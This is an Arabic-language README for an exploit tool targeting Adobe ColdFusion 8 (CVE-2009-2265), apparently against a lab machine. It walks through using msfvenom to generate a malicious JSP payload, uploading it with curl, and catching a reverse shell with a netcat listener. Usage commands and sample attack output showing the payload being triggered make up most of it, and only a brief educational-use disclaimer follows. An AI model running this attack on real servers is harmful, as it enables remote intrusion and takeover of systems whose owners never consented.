
Adobe ColdFusion 8 - تنفيذ الأوامر عن بُعد (RCE)
يستهدف هذا الاستغلال ثغرة أمنية معروفة في Adobe ColdFusion 8 (CVE-2009-2265). يتيح تنفيذ الأوامر عن بُعد (RCE) عن طريق رفع حمولة JSP ضارة تنشئ اتصال قشرة عكسية.
msfvenom.لاستخدام هذا الاستغلال، تحتاج إلى ما يلي:
./CVE-2009-2265 -l <LHOST> -p <LPORT> -r <RHOST> -q <RPORT>
-l <LHOST>: عنوان IP المحلي للمهاجم (مثل: 10.10.16.5).-p <LPORT>: المنفذ المحلي للمهاجم للقشرة العكسية (مثل: 9001).-r <RHOST>: عنوان IP البعيد للهدف (مثل: 10.10.10.11).-q <RPORT>: المنفذ البعيد للهدف حيث يعمل ColdFusion (مثل: 8500)../CVE-2009-2265 -l 10.10.16.5 -p 9001 -r 10.10.10.11 -q 8500
ابدأ مستمعاً على جهاز المهاجم الخاص بك:
nc -lnvp 9001
قم بتشغيل الاستغلال بالوسائط المناسبة.
بمجرد التنفيذ، ستتصل الحمولة مرة أخرى بالمستمع الخاص بك.
توليد الحمولة:
msfvenom لتوليد حمولة JSP ضارة.رفع الحمولة:
تشغيل الحمولة:
إنشاء القشرة العكسية:
msfvenom لتوليد الحمولة.curl لرفع الملفات وتشغيل الحمولة.nc (Netcat) للاستماع إلى اتصالات القشرة العكسية.[+] Generating JSP reverse shell payload...
[+] Payload saved as 'abcd1234-5678-90ef-ghij-1234567890ab.jsp'.
[+] Uploading the payload to the target...
[+] Server response:
<script type="text/javascript">
window.parent.OnUploadCompleted(0, "/userfiles/file/abcd1234-5678-90ef-ghij-1234567890ab.jsp", "abcd1234-5678-90ef-ghij-1234567890ab.txt", "0");
</script>
[+] Waiting for the Netcat listener to start on port 9001...
[+] Netcat listener detected running on port 9001!
[+] Attempting to trigger the payload...
[+] Payload triggered successfully. Check your listener for the reverse shell.
[+] Cleaning up local files...
[+] Done!
هذا السكريبت مخصص لأغراض تعليمية فقط. استخدمه على الأنظمة التي تمتلكها أو لديك إذن صريح لاختبارها. الاستخدام غير المصرح به لهذا الاستغلال على أنظمة لا تمتلكها غير قانوني وغير أخلاقي.
تم تطويره بواسطة [0xDTC].